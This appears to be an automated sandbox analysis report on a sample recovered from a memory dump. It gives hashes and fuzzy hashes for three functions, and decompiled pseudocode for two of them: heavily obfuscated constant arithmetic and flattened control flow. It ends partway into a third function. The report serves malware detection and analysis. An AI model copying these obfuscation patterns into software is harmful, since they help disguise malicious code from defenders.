Opcode ID: 46859ed1d0eff8081cebce0bb2c0f839f7e2adef3d13e285519f38a985ca9121
Instruction ID: 6d33461a06310b4ac91ab047a2d704ccdde9f8bef8385adb041040d9bdfc8a72
Opcode Fuzzy Hash: 46859ed1d0eff8081cebce0bb2c0f839f7e2adef3d13e285519f38a985ca9121
Instruction Fuzzy Hash: 2B1231719083819FE364CF25C585A5BBBE1FBC4398F10891DF6C98A261D7B19A49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 1001B6DB, Relevance: 7.9, Strings: 6, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1001B6DB(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				void* _t355;
				void* _t390;
				void* _t398;
				void* _t413;
				intOrPtr _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int* _t477;

				_push(_a8);
				_t460 = 0;
				_push(_a4);
				_push(__edx);
				_push(0);
				E100167B8(_t355);
				_v1568 = 0xbc2acd;
				_t477 =  &(( &_v1712)[4]);
				_v1564 = 0;
				_v1704 = 0x5a480c;
				_t413 = 0x3f8b29f;
				_t461 = 0xd;
				_v1704 = _v1704 / _t461;
				_v1704 = _v1704 << 2;
				_t462 = 0x38;
				_v1704 = _v1704 * 0x12;
				_v1704 = _v1704 ^ 0x01f40521;
				_v1680 = 0xb0cddc;
				_v1680 = _v1680 >> 9;
				_v1680 = _v1680 / _t462;
				_t463 = 0x33;
				_v1680 = _v1680 * 0x7c;
				_v1680 = _v1680 ^ 0x00092808;
				_v1652 = 0x414835;
				_t32 =  &_v1652; // 0x414835
				_v1652 =  *_t32 / _t463;
				_t38 =  &_v1652; // 0x414835
				_t464 = 0x60;
				_v1652 =  *_t38 * 0x23;
				_v1652 = _v1652 ^ 0x0024f1bc;
				_v1600 = 0x4e6953;
				_v1600 = _v1600 >> 4;
				_v1600 = _v1600 ^ 0x0007f43a;
				_v1672 = 0xc83333;
				_v1672 = _v1672 / _t464;
				_v1672 = _v1672 + 0xead;
				_t465 = 0x66;
				_v1672 = _v1672 / _t465;
				_v1672 = _v1672 ^ 0x000b28b7;
				_v1608 = 0xc83183;
				_v1608 = _v1608 >> 0xf;
				_v1608 = _v1608 ^ 0x0003fff3;
				_v1656 = 0xdd4415;
				_v1656 = _v1656 ^ 0x288e6691;
				_v1656 = _v1656 + 0xffffe973;
				_v1656 = _v1656 ^ 0x285b4bc8;
				_v1692 = 0x8c4123;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 >> 2;
				_v1692 = _v1692 ^ 0x046892a5;
				_v1700 = 0xba8f6c;
				_v1700 = _v1700 | 0x0822cce3;
				_v1700 = _v1700 * 0x3e;
				_v1700 = _v1700 ^ 0x2d138571;
				_v1700 = _v1700 ^ 0x302507f5;
				_v1640 = 0xa3f315;
				_v1640 = _v1640 + 0xffff1ddb;
				_v1640 = _v1640 + 0xffffd174;
				_v1640 = _v1640 ^ 0x00acd3a1;
				_v1648 = 0x59f075;
				_v1648 = _v1648 | 0x10041667;
				_t466 = 0x3e;
				_v1648 = _v1648 * 0x61;
				_v1648 = _v1648 ^ 0x339ffffd;
				_v1596 = 0x1c47eb;
				_v1596 = _v1596 + 0xc2e1;
				_v1596 = _v1596 ^ 0x001f0c39;
				_v1684 = 0xfce1cb;
				_v1684 = _v1684 | 0xbf7ffeff;
				_v1684 = _v1684 ^ 0xbff44ff0;
				_v1604 = 0xad8c73;
				_v1604 = _v1604 << 2;
				_v1604 = _v1604 ^ 0x02baab27;
				_v1676 = 0x9f31bb;
				_v1676 = _v1676 | 0xb3468b1f;
				_v1676 = _v1676 + 0x1d5;
				_v1676 = _v1676 + 0x227d;
				_v1676 = _v1676 ^ 0xb3d31805;
				_v1624 = 0xdc3966;
				_v1624 = _v1624 | 0x4d5de61f;
				_v1624 = _v1624 ^ 0xa3242a85;
				_v1624 = _v1624 ^ 0xeefa09c5;
				_v1632 = 0xe89566;
				_v1632 = _v1632 | 0x65ad3b71;
				_v1632 = _v1632 / _t466;
				_v1632 = _v1632 ^ 0x01a47c70;
				_v1628 = 0x3ae76;
				_v1628 = _v1628 >> 8;
				_v1628 = _v1628 | 0xf32a7eb6;
				_v1628 = _v1628 ^ 0xf3270824;
				_v1644 = 0x8bf4d3;
				_v1644 = _v1644 + 0x8838;
				_t467 = 0x32;
				_v1644 = _v1644 / _t467;
				_v1644 = _v1644 ^ 0x000e4ddb;
				_v1572 = 0xcead;
				_t468 = 0x2f;
				_v1572 = _v1572 / _t468;
				_v1572 = _v1572 ^ 0x0003a3db;
				_v1620 = 0xdeddb0;
				_v1620 = _v1620 + 0xffff948e;
				_v1620 = _v1620 << 8;
				_v1620 = _v1620 ^ 0xde709f25;
				_v1636 = 0x34b2fc;
				_v1636 = _v1636 | 0xd9ed9b28;
				_t469 = 0x35;
				_v1636 = _v1636 / _t469;
				_v1636 = _v1636 ^ 0x0417a1ec;
				_v1592 = 0x9f3679;
				_v1592 = _v1592 * 0x23;
				_v1592 = _v1592 ^ 0x15cf9c8e;
				_v1576 = 0x45c356;
				_v1576 = _v1576 + 0xa600;
				_v1576 = _v1576 ^ 0x004e9aa1;
				_v1712 = 0xc65e4;
				_v1712 = _v1712 + 0xffff24cf;
				_v1712 = _v1712 >> 0xe;
				_v1712 = _v1712 + 0x70fb;
				_v1712 = _v1712 ^ 0x00069359;
				_v1688 = 0xda7605;
				_v1688 = _v1688 + 0xff4c;
				_v1688 = _v1688 + 0xf037;
				_v1688 = _v1688 + 0xffff9eb6;
				_v1688 = _v1688 ^ 0x00dbd780;
				_v1664 = 0xae935c;
				_t470 = 0x34;
				_v1664 = _v1664 * 0x2e;
				_v1664 = _v1664 + 0xffff1e64;
				_v1664 = _v1664 << 6;
				_v1664 = _v1664 ^ 0xd763960b;
				_v1612 = 0xd10e4a;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x0d19501e;
				_v1696 = 0x633a23;
				_t238 =  &_v1696; // 0x633a23
				_v1696 =  *_t238 / _t470;
				_v1696 = _v1696 + 0xffff3e37;
				_v1696 = _v1696 | 0x93a9b8cc;
				_v1696 = _v1696 ^ 0x93a76d88;
				_v1708 = 0x839cc2;
				_t471 = 0x5f;
				_v1708 = _v1708 * 0x74;
				_v1708 = _v1708 + 0xffffb382;
				_v1708 = _v1708 | 0x7fdfb313;
				_v1708 = _v1708 ^ 0x7ff47024;
				_v1584 = 0xb8f2ab;
				_v1584 = _v1584 | 0x9ee9ee13;
				_v1584 = _v1584 ^ 0x9ef5d2b7;
				_v1580 = 0x2442a8;
				_v1580 = _v1580 / _t471;
				_v1580 = _v1580 ^ 0x00050125;
				_v1588 = 0x881657;
				_v1588 = _v1588 + 0xffffe142;
				_v1588 = _v1588 ^ 0x00806cef;
				_v1616 = 0xce80b;
				_v1616 = _v1616 >> 6;
				_v1616 = _v1616 >> 0xe;
				_v1616 = _v1616 ^ 0x000dffff;
				_v1660 = 0x4d6de4;
				_v1660 = _v1660 << 0xd;
				_t472 = 0x58;
				_v1660 = _v1660 * 0x5f;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 ^ 0x700c3609;
				_v1668 = 0x6c8191;
				_v1668 = _v1668 / _t472;
				_v1668 = _v1668 | 0x235f5c85;
				_v1668 = _v1668 + 0xf49a;
				_v1668 = _v1668 ^ 0x236e4966;
				do {
					while(_t413 != 0x277e4bb) {
						if(_t413 == 0x2ccb3c1) {
							_push(_v1620);
							_push(_v1572);
							_push(_v1644);
							_t398 = E1000416C(_v1628, 0x100018f4);
							E1000FE15( &_v1560, __eflags);
							E10011DF4( *0x10025208 + 0x1c, __eflags, _t460, _v1592,  &_v520, _v1576,  &_v1040, _v1712, _v1688,  &_v1560, _v1664, _v1612, _t398,  &_v1560,  *0x10025208 + 0x230, _v1696);
							E1000B952(_v1708, _t398, _v1584, _v1580);
							_t477 =  &(_t477[0x13]);
							_t413 = 0xa18d04d;
							continue;
						} else {
							if(_t413 == 0x3f8b29f) {
								_push(_t413);
								E1000441F(_v1680, _v1704, _v1652, _v1600,  &_v1040, _t413, _v1672);
								_t477 =  &(_t477[7]);
								_t413 = 0x277e4bb;
								continue;
							} else {
								_t484 = _t413 - 0xa18d04d;
								if(_t413 != 0xa18d04d) {
									goto L10;
								} else {
									_push(_v1668);
									_push( &_v520);
									_push(_t413);
									_push(_t460);
									_push(_v1660);
									_push(_v1616);
									_push(_v1588);
									E1000D1FD(0, 0, _t484);
									_t460 =  !=  ? 1 : _t460;
								}
							}
						}
						L6:
						return _t460;
					}
					_push(_v1700);
					_push(_v1692);
					_push(_v1656);
					_t390 = E1000416C(_v1608, 0x10001804);
					E1000FE15( &_v1560, __eflags);
					__eflags =  *0x10025208 + 0x230;
					E1000FFBA( &_v1040,  &_v1560, _v1640, _v1648,  *0x10025208 + 0x230,  &_v520, _v1596, 0x104, _v1684, _t390, _v1604);
					E1000B952(_v1676, _t390, _v1624, _v1632);
					_t477 =  &(_t477[0xf]);
					_t413 = 0xa18d04d;
					L10:
					__eflags = _t413 - 0x4875327;
				} while (__eflags != 0);
				goto L6;
			}

0x1001b6e5
0x1001b6ec
0x1001b6ee
0x1001b6f5
0x1001b6f6
0x1001b6f7
0x1001b6fc
0x1001b707
0x1001b70a
0x1001b713
0x1001b71b
0x1001b726
0x1001b72b
0x1001b731
0x1001b73b
0x1001b73e
0x1001b742
0x1001b74a
0x1001b752
0x1001b75f
0x1001b768
0x1001b76b
0x1001b76f
0x1001b777
0x1001b77f
0x1001b787
0x1001b78b
0x1001b790
0x1001b793
0x1001b797
0x1001b79f
0x1001b7aa
0x1001b7b2
0x1001b7bd
0x1001b7cd
0x1001b7d1
0x1001b7dd
0x1001b7e0
0x1001b7e4
0x1001b7ec
0x1001b7f4
0x1001b7f9
0x1001b801
0x1001b809
0x1001b811
0x1001b819
0x1001b821
0x1001b829
0x1001b82e
0x1001b833
0x1001b838
0x1001b840
0x1001b848
0x1001b855
0x1001b859
0x1001b861
0x1001b86b
0x1001b873
0x1001b87b
0x1001b883
0x1001b88b
0x1001b893
0x1001b8a2
0x1001b8a5
0x1001b8a9
0x1001b8b1
0x1001b8bc
0x1001b8c7
0x1001b8d2
0x1001b8da
0x1001b8e2
0x1001b8ea
0x1001b8f5
0x1001b8fd
0x1001b908
0x1001b910
0x1001b918
0x1001b920
0x1001b928
0x1001b930
0x1001b938
0x1001b940
0x1001b948
0x1001b950
0x1001b958
0x1001b968
0x1001b96c
0x1001b974
0x1001b97c
0x1001b981
0x1001b989
0x1001b991
0x1001b999
0x1001b9a5
0x1001b9aa
0x1001b9b0
0x1001b9b8
0x1001b9ca
0x1001b9cf
0x1001b9d8
0x1001b9e3
0x1001b9eb
0x1001b9f3
0x1001b9f8
0x1001ba00
0x1001ba08
0x1001ba14
0x1001ba17
0x1001ba1b
0x1001ba23
0x1001ba36
0x1001ba3d
0x1001ba48
0x1001ba53
0x1001ba5e
0x1001ba69
0x1001ba71
0x1001ba79
0x1001ba7e
0x1001ba88
0x1001ba95
0x1001baa2
0x1001baaa
0x1001bab2
0x1001baba
0x1001bac2
0x1001bad1
0x1001bad4
0x1001bad8
0x1001bae0
0x1001bae5
0x1001baed
0x1001baf5
0x1001bafa
0x1001bb02
0x1001bb0a
0x1001bb12
0x1001bb16
0x1001bb1e
0x1001bb26
0x1001bb2e
0x1001bb3b
0x1001bb3e
0x1001bb42
0x1001bb4a
0x1001bb52
0x1001bb5a
0x1001bb65
0x1001bb70
0x1001bb7b
0x1001bb91
0x1001bb98
0x1001bba3
0x1001bbae
0x1001bbb9
0x1001bbc4
0x1001bbcc
0x1001bbd1
0x1001bbd6
0x1001bbde
0x1001bbe6
0x1001bbf0
0x1001bbf1
0x1001bbf5
0x1001bbfa
0x1001bc02
0x1001bc10
0x1001bc14
0x1001bc1c
0x1001bc24
0x1001bc2c
0x1001bc2c
0x1001bc3a
0x1001bcc1
0x1001bcca
0x1001bcd1
0x1001bcd9
0x1001bcea
0x1001bd4a
0x1001bd63
0x1001bd68
0x1001bd6b
0x00000000
0x1001bc40
0x1001bc46
0x1001bc91
0x1001bcb2
0x1001bcb7
0x1001bcba
0x00000000
0x1001bc48
0x1001bc48
0x1001bc4a
0x00000000
0x1001bc50
0x1001bc50
0x1001bc5d
0x1001bc5e
0x1001bc5f
0x1001bc60
0x1001bc66
0x1001bc6d
0x1001bc74
0x1001bc81
0x1001bc81
0x1001bc4a
0x1001bc46
0x1001bc84
0x1001bc90
0x1001bc90
0x1001bd72
0x1001bd7b
0x1001bd7f
0x1001bd8a
0x1001bd98
0x1001bdc9
0x1001bdeb
0x1001be04
0x1001be09
0x1001be0c
0x1001be0e
0x1001be0e
0x1001be0e
0x00000000

Strings

fIn#, xrefs: 1001BC24
mM, xrefs: 1001BBDE
}", xrefs: 1001B920
5HA, xrefs: 1001B77F
SiN, xrefs: 1001B79F
#:c, xrefs: 1001BB0A

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: #:c$5HA$SiN$fIn#$}"$mM
API String ID: 0-197272062
Opcode ID: 30eca28146ffd073d0e0d08e791f6c96bf38bcbe94af73100a6e06c08fa4ab7d
Instruction ID: beb2b1e2841a81cadba3cb9c4b8085bc5470d6aeec4193dc758f522bf00dc8f4
Opcode Fuzzy Hash: 30eca28146ffd073d0e0d08e791f6c96bf38bcbe94af73100a6e06c08fa4ab7d
Instruction Fuzzy Hash: 1B0232715093819FD364CF65C88AA8FBBF1FBC5358F10891DF19A86260DBB18949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100093A7, Relevance: 7.8, Strings: 6, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E100093A7(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _t386;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t422;
				void* _t444;
				void* _t445;
				signed int* _t449;

				_t449 =  &_v2776;
				_t444 = __ecx;
				_v2604 = _v2604 & 0x00000000;
				_v2612 = 0x85e7af;
				_v2608 = 0x98eb16;
				_v2616 = 0x53bc18;
				_v2616 = _v2616 >> 1;
				_v2616 = _v2616 ^ 0x0029de25;
				_v2632 = 0x871402;
				_v2632 = _v2632 << 5;
				_v2632 = _v2632 ^ 0x10e58907;
				_v2772 = 0x1a8c29;
				_v2772 = _v2772 >> 8;
				_v2772 = _v2772 ^ 0xf05a43ef;
				_v2772 = _v2772 + 0x4c75;
				_v2772 = _v2772 ^ 0xf050a4b3;
				_v2764 = 0x13149f;
				_v2764 = _v2764 + 0xffff3dc1;
				_v2764 = _v2764 >> 7;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x00054c56;
				_v2732 = 0xb51d9b;
				_v2732 = _v2732 << 0xd;
				_v2732 = _v2732 + 0xb8cc;
				_v2732 = _v2732 ^ 0x6678d2ff;
				_v2732 = _v2732 ^ 0xc5cf7d33;
				_v2620 = 0xe0c8f9;
				_v2620 = _v2620 + 0x3080;
				_v2620 = _v2620 ^ 0x00e39080;
				_v2740 = 0x3293ea;
				_v2740 = _v2740 << 5;
				_v2740 = _v2740 >> 0xd;
				_v2740 = _v2740 | 0x8fe7978d;
				_v2740 = _v2740 ^ 0x8fe5aeac;
				_v2664 = 0x255a26;
				_v2664 = _v2664 ^ 0xdcc167cb;
				_v2664 = _v2664 ^ 0xdce07419;
				_v2724 = 0x3bb419;
				_v2724 = _v2724 ^ 0x5f0683c7;
				_v2724 = _v2724 ^ 0xd6874eeb;
				_v2724 = _v2724 ^ 0xe718d742;
				_v2724 = _v2724 ^ 0x6ea416a2;
				_v2756 = 0xcba38b;
				_v2756 = _v2756 * 0x43;
				_v2756 = _v2756 + 0x2a52;
				_t445 = 0x296d301;
				_v2756 = _v2756 * 0x4f;
				_v2756 = _v2756 ^ 0x7272b746;
				_v2652 = 0xfe9722;
				_v2652 = _v2652 << 0xa;
				_v2652 = _v2652 ^ 0xfa598b71;
				_v2624 = 0x848dd;
				_v2624 = _v2624 ^ 0xe6b07356;
				_v2624 = _v2624 ^ 0xe6b45529;
				_v2644 = 0x532412;
				_v2644 = _v2644 * 0x21;
				_v2644 = _v2644 ^ 0x0abbdabf;
				_v2688 = 0x7b8d1d;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x6d;
				_v2688 = _v2688 ^ 0x0007c941;
				_v2700 = 0x3e7454;
				_t102 =  &_v2700; // 0x3e7454
				_v2700 =  *_t102 * 0xd;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 ^ 0x019d8153;
				_v2776 = 0x967587;
				_v2776 = _v2776 >> 9;
				_v2776 = _v2776 >> 3;
				_v2776 = _v2776 | 0xe685fb56;
				_v2776 = _v2776 ^ 0xe685474b;
				_v2748 = 0x342f79;
				_v2748 = _v2748 + 0x8253;
				_v2748 = _v2748 >> 0xa;
				_t407 = 0x68;
				_v2748 = _v2748 * 0x45;
				_v2748 = _v2748 ^ 0x0003b22b;
				_v2636 = 0x296593;
				_v2636 = _v2636 >> 5;
				_v2636 = _v2636 ^ 0x000c7ad7;
				_v2696 = 0xc4eaa1;
				_v2696 = _v2696 + 0xffff42e0;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0x062654e6;
				_v2672 = 0x5b7b51;
				_v2672 = _v2672 ^ 0x95c163b9;
				_v2672 = _v2672 << 9;
				_v2672 = _v2672 ^ 0x34391f2c;
				_v2704 = 0xcf8e33;
				_v2704 = _v2704 + 0xffff5eae;
				_v2704 = _v2704 / _t407;
				_v2704 = _v2704 ^ 0x000ca7ec;
				_v2768 = 0x4a9627;
				_v2768 = _v2768 + 0xb4f2;
				_v2768 = _v2768 + 0x33a0;
				_v2768 = _v2768 ^ 0x1df1ad4d;
				_v2768 = _v2768 ^ 0x1db86a8e;
				_v2708 = 0x524687;
				_t408 = 0x69;
				_v2708 = _v2708 / _t408;
				_v2708 = _v2708 << 3;
				_v2708 = _v2708 ^ 0x000d46bd;
				_v2712 = 0xa22858;
				_v2712 = _v2712 | 0x2b1b8b93;
				_v2712 = _v2712 << 0xa;
				_v2712 = _v2712 ^ 0xeea26c8d;
				_v2680 = 0xdff56b;
				_v2680 = _v2680 >> 4;
				_v2680 = _v2680 | 0x53cd5eb5;
				_v2680 = _v2680 ^ 0x53c7ae97;
				_v2760 = 0x698b24;
				_v2760 = _v2760 + 0xffff14ba;
				_v2760 = _v2760 << 0xa;
				_v2760 = _v2760 ^ 0x220f3491;
				_v2760 = _v2760 ^ 0x8074fc1b;
				_v2628 = 0xca7a66;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0x94f855ed;
				_v2692 = 0x1de5e8;
				_v2692 = _v2692 + 0xa407;
				_v2692 = _v2692 + 0xf0e9;
				_v2692 = _v2692 ^ 0x00182f83;
				_v2716 = 0xfc2192;
				_t409 = 0x39;
				_v2716 = _v2716 / _t409;
				_v2716 = _v2716 >> 4;
				_v2716 = _v2716 ^ 0x00052540;
				_v2752 = 0xb47fe8;
				_v2752 = _v2752 ^ 0xff3b59ec;
				_v2752 = _v2752 | 0x555af989;
				_v2752 = _v2752 << 0xb;
				_v2752 = _v2752 ^ 0xfff52363;
				_v2684 = 0xe4df69;
				_v2684 = _v2684 | 0xdfa39463;
				_v2684 = _v2684 ^ 0xf41e1530;
				_v2684 = _v2684 ^ 0x2bf26e39;
				_v2744 = 0x77d4b2;
				_v2744 = _v2744 << 0xe;
				_v2744 = _v2744 + 0x7113;
				_v2744 = _v2744 | 0xf25bb995;
				_v2744 = _v2744 ^ 0xf778d187;
				_v2656 = 0x2bc5f6;
				_v2656 = _v2656 + 0xffff1828;
				_v2656 = _v2656 ^ 0x00241178;
				_v2660 = 0x82db31;
				_v2660 = _v2660 >> 0xb;
				_v2660 = _v2660 ^ 0x0003dd12;
				_v2728 = 0xe91a00;
				_v2728 = _v2728 ^ 0x10d36c86;
				_t410 = 0x1c;
				_v2728 = _v2728 * 0x27;
				_v2728 = _v2728 + 0xffff2325;
				_v2728 = _v2728 ^ 0x78eacc43;
				_v2736 = 0x7f0d7b;
				_v2736 = _v2736 ^ 0xdfec5721;
				_v2736 = _v2736 | 0x9d3da51a;
				_v2736 = _v2736 >> 6;
				_v2736 = _v2736 ^ 0x0378cacb;
				_v2676 = 0xb48b3;
				_v2676 = _v2676 / _t410;
				_t411 = 0xe;
				_v2676 = _v2676 * 0x18;
				_v2676 = _v2676 ^ 0x000459f7;
				_v2720 = 0x1fbee1;
				_v2720 = _v2720 >> 1;
				_v2720 = _v2720 ^ 0x9dadc8f0;
				_v2720 = _v2720 | 0xe54635c6;
				_v2720 = _v2720 ^ 0xfde23f90;
				_v2668 = 0xa948d6;
				_v2668 = _v2668 << 3;
				_v2668 = _v2668 + 0xffff8b7a;
				_v2668 = _v2668 ^ 0x054fe2b5;
				_v2640 = 0x114fa5;
				_v2640 = _v2640 >> 0xc;
				_v2640 = _v2640 ^ 0x000f598b;
				_v2648 = 0xdd4f90;
				_t386 = _v2648 / _t411;
				_v2648 = _t386;
				_v2648 = _v2648 ^ 0x0002ab99;
				do {
					while(_t445 != 0x296d301) {
						if(_t445 != 0x51a502c) {
							if(_t445 == 0x657ab98) {
								_push(_t411);
								E1000441F(_v2708, _v2616, _v2712, _v2680,  &_v1040, _t411, _v2760);
								_push(_v2752);
								_push(_v2716);
								_push(_v2692);
								E100049CE( &_v1040,  &_v2080, E1000416C(_v2628, 0x10001714), _v2684, _v2744, _v2628, _v2656, _v2660);
								_t422 = _v2728;
								E1000B952(_t422, _t399, _v2736, _v2676);
								_push(_v2648);
								_push( &_v520);
								_push(_t422);
								_push(0);
								_push(_v2640);
								_push(_v2668);
								_push(_v2720);
								return E1000D1FD(0, 0, 0);
							}
							goto L9;
						}
						E1001E780(_v2632, __eflags, _v2772,  &_v2600);
						 *((short*)(E10001A5C( &_v2600, _v2764, _v2732))) = 0;
						E1001215E(_v2620, _v2740, __eflags,  &_v1560);
						_push(_v2652);
						_push(_v2756);
						_push(_v2724);
						E100049CE( &_v2600,  &_v1560, E1000416C(_v2664, 0x10001684), _v2624, _v2644, _v2664, _v2688, _v2700);
						E1000B952(_v2776, _t392, _v2748, _v2636);
						_t411 = _v2696;
						_t386 = E1001C962(_t411, _v2672, _t444, _v2704, _v2768,  &_v2080);
						_t449 =  &(_t449[0x14]);
						__eflags = _t386;
						if(__eflags != 0) {
							_t445 = 0x657ab98;
							continue;
						}
						return _t386;
					}
					_t445 = 0x51a502c;
					L9:
					__eflags = _t445 - 0x564a993;
				} while (__eflags != 0);
				return _t386;
			}

0x100093a7
0x100093b1
0x100093b3
0x100093bb
0x100093c6
0x100093d1
0x100093dc
0x100093e3
0x100093ee
0x100093f9
0x10009401
0x1000940c
0x10009414
0x10009419
0x10009421
0x10009429
0x10009431
0x10009439
0x10009441
0x10009446
0x1000944b
0x10009453
0x1000945b
0x10009460
0x10009468
0x10009470
0x10009478
0x10009483
0x1000948e
0x10009499
0x100094a1
0x100094a6
0x100094ab
0x100094b3
0x100094bb
0x100094c6
0x100094d1
0x100094dc
0x100094e4
0x100094ec
0x100094f4
0x100094fc
0x10009504
0x10009511
0x10009515
0x1000951d
0x10009527
0x1000952b
0x10009533
0x1000953e
0x10009546
0x10009551
0x1000955c
0x10009567
0x10009572
0x10009585
0x1000958c
0x10009597
0x1000959f
0x100095a9
0x100095ad
0x100095b5
0x100095bd
0x100095c2
0x100095c6
0x100095ca
0x100095d2
0x100095da
0x100095df
0x100095e4
0x100095ec
0x100095f4
0x100095fc
0x10009604
0x10009612
0x10009615
0x10009619
0x10009621
0x1000962c
0x10009634
0x1000963f
0x10009647
0x1000964f
0x10009654
0x1000965c
0x10009664
0x1000966c
0x10009671
0x10009679
0x10009681
0x10009691
0x10009695
0x1000969d
0x100096a5
0x100096ad
0x100096b5
0x100096bd
0x100096c5
0x100096d1
0x100096d6
0x100096dc
0x100096e1
0x100096e9
0x100096f1
0x100096f9
0x100096fe
0x10009706
0x1000970e
0x10009713
0x1000971b
0x10009723
0x1000972b
0x10009733
0x10009738
0x10009740
0x10009748
0x10009753
0x1000975b
0x10009766
0x1000976e
0x10009776
0x1000977e
0x10009786
0x10009792
0x10009795
0x10009799
0x1000979e
0x100097a6
0x100097ae
0x100097b6
0x100097be
0x100097c3
0x100097cb
0x100097d3
0x100097db
0x100097e3
0x100097eb
0x100097f3
0x100097f8
0x10009800
0x10009808
0x10009810
0x1000981b
0x10009828
0x10009838
0x10009848
0x10009850
0x1000985b
0x10009863
0x10009872
0x10009875
0x10009879
0x10009881
0x10009889
0x10009891
0x10009899
0x100098a1
0x100098a6
0x100098ae
0x100098be
0x100098c7
0x100098c8
0x100098cc
0x100098d4
0x100098dc
0x100098e0
0x100098e8
0x100098f0
0x100098f8
0x10009900
0x10009905
0x1000990d
0x10009915
0x10009920
0x10009928
0x10009933
0x10009945
0x10009947
0x1000994e
0x10009959
0x10009959
0x10009967
0x1000996f
0x10009975
0x10009999
0x1000999e
0x100099a7
0x100099ab
0x100099f1
0x10009a03
0x10009a07
0x10009a18
0x10009a1f
0x10009a20
0x10009a21
0x10009a23
0x10009a2c
0x10009a33
0x00000000
0x10009a3c
0x00000000
0x1000996f
0x10009a5d
0x10009a7c
0x10009a8e
0x10009a93
0x10009a9f
0x10009aa3
0x10009ae6
0x10009afc
0x10009b1b
0x10009b23
0x10009b28
0x10009b2b
0x10009b2d
0x10009b33
0x00000000
0x10009b33
0x10009a49
0x10009a49
0x10009b3a
0x10009b3c
0x10009b3c
0x10009b3c
0x00000000

Strings

y/4, xrefs: 100095F4
uL, xrefs: 10009421
Tt>, xrefs: 100095BD
&Z%, xrefs: 100094BB
Q{[, xrefs: 1000965C
R*, xrefs: 10009515

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: &Z%$Q{[$R*$Tt>$uL$y/4
API String ID: 0-3124227048
Opcode ID: 984766dc01428462c790bd17eb3dfe2fa0ea5860f3e86a2766dc088b66df9161
Instruction ID: 8a59d2b9cf6968ee2268cfe178f5fbaaa3a115c62e6e7d249f233079a5b4f46f
Opcode Fuzzy Hash: 984766dc01428462c790bd17eb3dfe2fa0ea5860f3e86a2766dc088b66df9161
Instruction Fuzzy Hash: 9002FEB14083819FD3A9CF61C58AA9BBBE1FBC5748F10891CE1E986260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10016ACA, Relevance: 7.8, Strings: 6, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10016ACA(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t287;
				void* _t315;
				intOrPtr _t323;
				void* _t326;
				intOrPtr* _t327;
				void* _t329;
				intOrPtr _t351;
				intOrPtr* _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				void* _t363;
				void* _t364;

				_t327 = _a4;
